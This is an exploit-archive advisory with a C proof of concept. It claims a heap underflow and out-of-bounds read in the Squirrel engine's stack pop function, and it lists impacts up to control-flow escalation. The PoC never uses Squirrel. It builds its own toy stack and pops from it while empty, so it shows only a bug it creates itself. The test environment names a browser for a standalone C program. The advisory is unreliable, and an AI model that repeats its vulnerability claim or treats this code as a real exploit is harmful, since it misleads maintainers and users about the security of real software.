## https://sploitus.com/exploit?id=PACKETSTORM:216049
=============================================================================================================================================
| # Title : Squirrel Heap Underflow in Stack Pop Function Leading to Out-of-Bounds Read |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : http://squirrel-lang.org/ |
=============================================================================================================================================
[+] Summary : A vulnerability exists in the Squirrel engineβs stack implementation due to missing bounds checking in the PopTarget function.
When attempting to pop from an empty stack, the function reads from data[size - 1] (index -1), causing a heap buffer underflow.
[+] This allows:
Information disclosure (heap metadata or adjacent memory content)
Application crashes (segmentation faults)
Potential escalation if the leaked memory affects control flow
[+] Vulnerability Type: Out-of-Bounds Read / Heap Underflow
[+] Affected Component: Stack management in Squirrel Engine
[+] Save as: poc.c
[+] Translation with AddressSanitizer protection (recommended) : gcc -fsanitize=address -g poc.c -o poc
[+] Run : ./poc
[+] An ASAN report similar to:
heap-buffer-overflow
READ of size 8
[+] POC :
#include <stdio.h>
#include <stdlib.h>
typedef struct {
long long *data;
int size;
int capacity;
} TargetStack;
long long PopTarget(TargetStack *stack) {
long long target = stack->data[stack->size - 1];
stack->size--;
return target;
}
int main() {
TargetStack stack;
stack.capacity = 4;
stack.size = 0;
stack.data = (long long *)malloc(stack.capacity * sizeof(long long));
if (stack.data == NULL) return 1;
printf("Starting PoC...\n");
printf("Stack size: %d\n", stack.size);
printf("Attempting to PopTarget from empty stack...\n");
long long leaked_data = PopTarget(&stack);
printf("Leaked data from index [-1]: %lld\n", leaked_data);
free(stack.data);
return 0;
}
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================